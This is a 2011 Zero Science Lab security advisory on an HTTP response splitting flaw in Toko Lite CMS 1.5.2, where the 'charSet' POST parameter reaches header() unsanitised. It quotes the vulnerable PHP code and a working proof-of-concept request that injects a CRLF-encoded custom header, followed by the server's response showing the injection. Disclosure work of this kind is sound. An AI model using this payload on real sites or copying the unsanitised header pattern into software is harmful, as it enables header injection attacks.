87 lines
No EOL
2.3 KiB
Text
87 lines
No EOL
2.3 KiB
Text
Toko Lite CMS 1.5.2 (edit.php) HTTP Response Splitting Vulnerability
|
|
|
|
|
|
Vendor: Toko
|
|
Product web page: http://toko-contenteditor.pageil.net
|
|
Affected version: 1.5.2
|
|
|
|
Summary: Toko Web Content Editor cms is a compact, multi language, open
|
|
source web editor and content management system (CMS). It is advanced
|
|
easy to use yet fully featured program that can be integrated with any
|
|
existing site. It takes 2 minuets to install even for non technical users.
|
|
|
|
Desc: Input passed to the 'charSet' parameter in 'edit.php' is not properly
|
|
sanitised before being returned to the user. This can be exploited to insert
|
|
arbitrary HTTP headers, which are included in a response sent to the user.
|
|
|
|
|
|
====================================================================
|
|
/edit.php:
|
|
--------------------------------------------------------------------
|
|
|
|
3: $charSet = "iso-8859-1";
|
|
4: $dir = "ltr";
|
|
5:
|
|
6: if ( isset( $_POST[ "charSet" ] ) )
|
|
7: {
|
|
8: $charSet = $_POST[ "charSet" ];
|
|
9:
|
|
10: if ( $charSet == "windows-1255" )
|
|
11: {
|
|
12: $dir = "rtl";
|
|
13: }
|
|
14: }
|
|
15:
|
|
16: header( "Content-Type: text/html; charset=" . $charSet );
|
|
|
|
====================================================================
|
|
|
|
|
|
Tested on: Microsoft Windows XP Professional SP3 (EN)
|
|
Apache 2.2.14 (Win32)
|
|
PHP 5.3.1
|
|
MySQL 5.1.41
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2011-5048
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5048.php
|
|
|
|
CWE ID: 113
|
|
|
|
|
|
22.03.2011
|
|
|
|
|
|
------------
|
|
|
|
|
|
POST /tokolite1.5.2/edit.php HTTP/1.1
|
|
Content-Length: 55
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Cookie: PHPSESSID=as9l9t0a7rs9pmuflb7c5s9o70; pma_fontsize=82%25
|
|
Host: localhost:80
|
|
Connection: Keep-alive
|
|
Accept-Encoding: gzip,deflate
|
|
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
|
|
|
|
charSet=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection
|
|
|
|
--
|
|
|
|
HTTP/1.1 302 Found
|
|
Date: Tue, 22 Mar 2011 03:57:30 GMT
|
|
Server: Apache/2.2.14 (Win32)
|
|
X-Powered-By: PHP/5.3.1
|
|
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
|
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
|
Pragma: no-cache
|
|
Location: Login.php
|
|
Content-Length: 0
|
|
Keep-Alive: timeout=5, max=64
|
|
Connection: Keep-Alive
|
|
Content-Type: text/html; charset=
|
|
ZSL-Custom-Header: love_injection |